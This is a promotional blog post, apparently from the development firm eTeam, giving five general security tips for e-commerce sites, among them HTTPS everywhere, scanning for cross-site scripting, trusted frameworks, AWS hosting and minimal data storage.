Protecting the security of e-commerce sites is a multifaceted issue that affects developers, business owners and consumers. Luckily, there are some basic best practices and tips that every e-commerce site can apply to dramatically improve a site’s overall security.
Security isn’t something that you can relegate to the back burner. Bad security leads to lost sales, downtime for a site and serious liability in the case of stolen data. While some ignore security under the premise that ‘it won’t happen to me’, this is a serious risk as e-commerce sites, both big and small, are routinely targets for hacking.
If customers have even the tiniest inkling that security isn’t up to snuff at an e-commerce site, they’re unlikely to complete a purchase if entering their payment information is required. Once a company has lost customer trust due to a data breach, getting it back can be a long, uphill battle.
- Get basic web security right with HTTPS
It’s 2018. Every site on the internet really needs to get with HTTPS. In fact, consumers are becoming more and more aware of this and intuitively check their browser to make sure a site is secured.
Every page of an e-commerce site needs to be secured with HTTPS and not just login screens and payment pages as is often erroneously claimed. SSL should be everywhere on the website and does not limit to specific pages. Even Google is also an emphasis on ‘HTTPS Everywhere'. So, buy SSL certificate as early as possible and secure every bit of transactions on your website.
- Cross site scripting is the most common vulnerability
If you scan your store for cross-site scripting vulnerabilities, you’ve already eliminated the most common attack across the web. Cross-site scripting lets malicious third-party code run on a site, and that code is then able to access information that could be used in a further attack.
This type of vulnerability is easy to test for. All of our projects at eTeam are scanned with Sapience, an API security scanner that detects not only cross-site scripting but all of the top ten API vulnerabilities. We highly recommend that every single e-commerce store be scanned and tested for vulnerabilities..
- Use trusted frameworks
There’s a good reason security experts repeat the mantra of not rolling your own crypto: It’s way too easy to make a critical mistake if you’re building the entire security apparatus for your e-commerce site from scratch. There’s absolutely no reason to do this. We have more great frameworks than ever that have tried and true ways to handle security. Everything from passwords, authentication and payment details have already been hashed out by some of the leading minds in the industry. Don’t reinvent the wheel.
If you’re wondering what framework is best for your e-commerce site, have a look at our guide to choosing between Magento, Spree and Solidus. The short version is that Ruby on Rails provides some great security features that make Solidus the logical starting point for new sites.
- Good hosting providers add security
Many newer e-commerce sites try to cut corners by relying on dodgy hosting providers. What may seem like small savings today could end up costing you big down the road. AWS is the best option for e-commerce for a number of reasons. Usually we recommend AWS because of autoscaling, load balancing and smoothly handling seasonal spikes, but we can also turn to AWS for security features.
A stateless web application that relies on HTTPS for communication, such as a website, web-based API, or mobile application. Source
Returning to our first point, AWS makes it simple to issue certificates and implement HTTPS everywhere. AWS Shield is one of the best defenses against crippling DDoS attacks that could render a site inoperable. It’s worth hiring an AWS certified partner from the very start to make sure you optimize both the costs and security settings for your e-commerce store.
- Only store what you need
Logically enough, if you don’t have something, it can’t be stolen. Another easy way to enhance your security is to make sure that any customer information or data that you keep is actually necessary.
Storing payment information yourself exposes you to significant risks, so if you can find ways around storing data, consider this option. For instance, paying via Google Pay, Apple Pay, Stripe or PayPal is instantaneous and transfers much of the security risk away from smaller e-commerce sites while keeping the convenience of not having to enter payment information each time a purchase is made.
Security isn’t an afterthought
While these five tips are quick ways to bolster the security of your e-commerce shop, they’re not enough to completely lower your guard. It’s important to stay up-to-date on evolving security threats and make sure your site is ready to deal with them.
At eTeam we’ve been developing for retail and e-commerce since 2009 and are ready to help you launch your e-commerce site or maintain an existing one. Let’s get in touch if you have any questions about e-commerce security.